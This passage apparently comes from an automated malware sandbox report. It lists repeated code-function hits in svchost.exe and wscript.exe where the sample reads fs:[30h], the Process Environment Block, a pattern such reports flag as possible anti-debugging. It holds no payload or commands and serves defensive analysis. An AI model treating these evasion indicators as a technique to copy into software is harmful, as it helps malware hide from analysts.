Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03958E00 mov eax, dword ptr fs:[00000030h]	1_2_03958E00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1608 mov eax, dword ptr fs:[00000030h]	1_2_039E1608
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039DFE3F mov eax, dword ptr fs:[00000030h]	1_2_039DFE3F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392E620 mov eax, dword ptr fs:[00000030h]	1_2_0392E620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]	1_2_03937E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]	1_2_03937E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]	1_2_03937E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]	1_2_03937E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]	1_2_03937E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]	1_2_03937E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EAE44 mov eax, dword ptr fs:[00000030h]	1_2_039EAE44
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EAE44 mov eax, dword ptr fs:[00000030h]	1_2_039EAE44
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]	1_2_0394AE73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]	1_2_0394AE73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]	1_2_0394AE73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]	1_2_0394AE73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]	1_2_0394AE73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393766D mov eax, dword ptr fs:[00000030h]	1_2_0393766D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395FD9B mov eax, dword ptr fs:[00000030h]	1_2_0395FD9B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395FD9B mov eax, dword ptr fs:[00000030h]	1_2_0395FD9B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]	1_2_03952581
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]	1_2_03952581
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]	1_2_03952581
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]	1_2_03952581
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]	1_2_03922D8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]	1_2_03922D8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]	1_2_03922D8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]	1_2_03922D8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]	1_2_03922D8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03951DB5 mov eax, dword ptr fs:[00000030h]	1_2_03951DB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03951DB5 mov eax, dword ptr fs:[00000030h]	1_2_03951DB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03951DB5 mov eax, dword ptr fs:[00000030h]	1_2_03951DB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F05AC mov eax, dword ptr fs:[00000030h]	1_2_039F05AC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F05AC mov eax, dword ptr fs:[00000030h]	1_2_039F05AC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039535A1 mov eax, dword ptr fs:[00000030h]	1_2_039535A1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]	1_2_039A6DC9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]	1_2_039A6DC9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]	1_2_039A6DC9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6DC9 mov ecx, dword ptr fs:[00000030h]	1_2_039A6DC9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]	1_2_039A6DC9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]	1_2_039A6DC9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039D8DF1 mov eax, dword ptr fs:[00000030h]	1_2_039D8DF1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393D5E0 mov eax, dword ptr fs:[00000030h]	1_2_0393D5E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393D5E0 mov eax, dword ptr fs:[00000030h]	1_2_0393D5E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h]	1_2_039EFDE2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h]	1_2_039EFDE2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h]	1_2_039EFDE2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h]	1_2_039EFDE2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392AD30 mov eax, dword ptr fs:[00000030h]	1_2_0392AD30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EE539 mov eax, dword ptr fs:[00000030h]	1_2_039EE539
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F8D34 mov eax, dword ptr fs:[00000030h]	1_2_039F8D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039AA537 mov eax, dword ptr fs:[00000030h]	1_2_039AA537
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03954D3B mov eax, dword ptr fs:[00000030h]	1_2_03954D3B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03954D3B mov eax, dword ptr fs:[00000030h]	1_2_03954D3B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03954D3B mov eax, dword ptr fs:[00000030h]	1_2_03954D3B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03947D50 mov eax, dword ptr fs:[00000030h]	1_2_03947D50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03963D43 mov eax, dword ptr fs:[00000030h]	1_2_03963D43
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A3540 mov eax, dword ptr fs:[00000030h]	1_2_039A3540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039D3D40 mov eax, dword ptr fs:[00000030h]	1_2_039D3D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394C577 mov eax, dword ptr fs:[00000030h]	1_2_0394C577
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394C577 mov eax, dword ptr fs:[00000030h]	1_2_0394C577
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393849B mov eax, dword ptr fs:[00000030h]	1_2_0393849B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F8CD6 mov eax, dword ptr fs:[00000030h]	1_2_039F8CD6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E14FB mov eax, dword ptr fs:[00000030h]	1_2_039E14FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6CF0 mov eax, dword ptr fs:[00000030h]	1_2_039A6CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6CF0 mov eax, dword ptr fs:[00000030h]	1_2_039A6CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6CF0 mov eax, dword ptr fs:[00000030h]	1_2_039A6CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h]	1_2_039A6C0A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h]	1_2_039A6C0A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h]	1_2_039A6C0A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h]	1_2_039A6C0A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F740D mov eax, dword ptr fs:[00000030h]	1_2_039F740D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F740D mov eax, dword ptr fs:[00000030h]	1_2_039F740D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F740D mov eax, dword ptr fs:[00000030h]	1_2_039F740D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395BC2C mov eax, dword ptr fs:[00000030h]	1_2_0395BC2C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BC450 mov eax, dword ptr fs:[00000030h]	1_2_039BC450
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BC450 mov eax, dword ptr fs:[00000030h]	1_2_039BC450
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395A44B mov eax, dword ptr fs:[00000030h]	1_2_0395A44B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394746D mov eax, dword ptr fs:[00000030h]	1_2_0394746D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04869080 mov eax, dword ptr fs:[00000030h]	7_2_04869080
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E3884 mov eax, dword ptr fs:[00000030h]	7_2_048E3884
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E3884 mov eax, dword ptr fs:[00000030h]	7_2_048E3884
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487849B mov eax, dword ptr fs:[00000030h]	7_2_0487849B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A90AF mov eax, dword ptr fs:[00000030h]	7_2_048A90AF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]	7_2_048920A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]	7_2_048920A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]	7_2_048920A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]	7_2_048920A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]	7_2_048920A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]	7_2_048920A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489F0BF mov ecx, dword ptr fs:[00000030h]	7_2_0489F0BF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489F0BF mov eax, dword ptr fs:[00000030h]	7_2_0489F0BF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489F0BF mov eax, dword ptr fs:[00000030h]	7_2_0489F0BF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04938CD6 mov eax, dword ptr fs:[00000030h]	7_2_04938CD6
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]	7_2_048FB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048FB8D0 mov ecx, dword ptr fs:[00000030h]	7_2_048FB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]	7_2_048FB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]	7_2_048FB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]	7_2_048FB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]	7_2_048FB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_049214FB mov eax, dword ptr fs:[00000030h]	7_2_049214FB
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048658EC mov eax, dword ptr fs:[00000030h]	7_2_048658EC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6CF0 mov eax, dword ptr fs:[00000030h]	7_2_048E6CF0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6CF0 mov eax, dword ptr fs:[00000030h]	7_2_048E6CF0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6CF0 mov eax, dword ptr fs:[00000030h]	7_2_048E6CF0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6C0A mov eax, dword ptr fs:[00000030h]	7_2_048E6C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6C0A mov eax, dword ptr fs:[00000030h]	7_2_048E6C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6C0A mov eax, dword ptr fs:[00000030h]	7_2_048E6C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6C0A mov eax, dword ptr fs:[00000030h]	7_2_048E6C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04934015 mov eax, dword ptr fs:[00000030h]	7_2_04934015
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04934015 mov eax, dword ptr fs:[00000030h]	7_2_04934015
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E7016 mov eax, dword ptr fs:[00000030h]	7_2_048E7016
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E7016 mov eax, dword ptr fs:[00000030h]	7_2_048E7016
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E7016 mov eax, dword ptr fs:[00000030h]	7_2_048E7016
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0493740D mov eax, dword ptr fs:[00000030h]	7_2_0493740D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0493740D mov eax, dword ptr fs:[00000030h]	7_2_0493740D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0493740D mov eax, dword ptr fs:[00000030h]	7_2_0493740D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489002D mov eax, dword ptr fs:[00000030h]	7_2_0489002D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489002D mov eax, dword ptr fs:[00000030h]	7_2_0489002D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489002D mov eax, dword ptr fs:[00000030h]	7_2_0489002D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489002D mov eax, dword ptr fs:[00000030h]	7_2_0489002D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489002D mov eax, dword ptr fs:[00000030h]	7_2_0489002D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489BC2C mov eax, dword ptr fs:[00000030h]	7_2_0489BC2C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487B02A mov eax, dword ptr fs:[00000030h]	7_2_0487B02A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487B02A mov eax, dword ptr fs:[00000030h]	7_2_0487B02A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487B02A mov eax, dword ptr fs:[00000030h]	7_2_0487B02A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487B02A mov eax, dword ptr fs:[00000030h]	7_2_0487B02A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489A44B mov eax, dword ptr fs:[00000030h]	7_2_0489A44B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04880050 mov eax, dword ptr fs:[00000030h]	7_2_04880050
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04880050 mov eax, dword ptr fs:[00000030h]	7_2_04880050
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048FC450 mov eax, dword ptr fs:[00000030h]	7_2_048FC450
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048FC450 mov eax, dword ptr fs:[00000030h]	7_2_048FC450
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04922073 mov eax, dword ptr fs:[00000030h]	7_2_04922073
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0488746D mov eax, dword ptr fs:[00000030h]	7_2_0488746D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04931074 mov eax, dword ptr fs:[00000030h]	7_2_04931074
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04892581 mov eax, dword ptr fs:[00000030h]	7_2_04892581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04892581 mov eax, dword ptr fs:[00000030h]	7_2_04892581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04892581 mov eax, dword ptr fs:[00000030h]	7_2_04892581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04892581 mov eax, dword ptr fs:[00000030h]	7_2_04892581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0488C182 mov eax, dword ptr fs:[00000030h]	7_2_0488C182
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489A185 mov eax, dword ptr fs:[00000030h]	7_2_0489A185
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h]	7_2_04862D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h]	7_2_04862D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h]	7_2_04862D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h]	7_2_04862D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h]	7_2_04862D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489FD9B mov eax, dword ptr fs:[00000030h]	7_2_0489FD9B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489FD9B mov eax, dword ptr fs:[00000030h]	7_2_0489FD9B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04892990 mov eax, dword ptr fs:[00000030h]	7_2_04892990
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048935A1 mov eax, dword ptr fs:[00000030h]	7_2_048935A1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E69A6 mov eax, dword ptr fs:[00000030h]	7_2_048E69A6
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048961A0 mov eax, dword ptr fs:[00000030h]	7_2_048961A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048961A0 mov eax, dword ptr fs:[00000030h]	7_2_048961A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E51BE mov eax, dword ptr fs:[00000030h]	7_2_048E51BE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E51BE mov eax, dword ptr fs:[00000030h]	7_2_048E51BE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E51BE mov eax, dword ptr fs:[00000030h]	7_2_048E51BE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E51BE mov eax, dword ptr fs:[00000030h]	7_2_048E51BE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04891DB5 mov eax, dword ptr fs:[00000030h]	7_2_04891DB5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04891DB5 mov eax, dword ptr fs:[00000030h]	7_2_04891DB5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04891DB5 mov eax, dword ptr fs:[00000030h]	7_2_04891DB5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_049305AC mov eax, dword ptr fs:[00000030h]	7_2_049305AC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_049305AC mov eax, dword ptr fs:[00000030h]	7_2_049305AC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h]	7_2_048E6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h]	7_2_048E6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h]	7_2_048E6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6DC9 mov ecx, dword ptr fs:[00000030h]	7_2_048E6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h]	7_2_048E6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h]	7_2_048E6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04918DF1 mov eax, dword ptr fs:[00000030h]	7_2_04918DF1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486B1E1 mov eax, dword ptr fs:[00000030h]	7_2_0486B1E1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486B1E1 mov eax, dword ptr fs:[00000030h]	7_2_0486B1E1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486B1E1 mov eax, dword ptr fs:[00000030h]	7_2_0486B1E1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048F41E8 mov eax, dword ptr fs:[00000030h]	7_2_048F41E8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487D5E0 mov eax, dword ptr fs:[00000030h]	7_2_0487D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487D5E0 mov eax, dword ptr fs:[00000030h]	7_2_0487D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04869100 mov eax, dword ptr fs:[00000030h]	7_2_04869100
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04869100 mov eax, dword ptr fs:[00000030h]	7_2_04869100
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04869100 mov eax, dword ptr fs:[00000030h]	7_2_04869100
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04938D34 mov eax, dword ptr fs:[00000030h]	7_2_04938D34
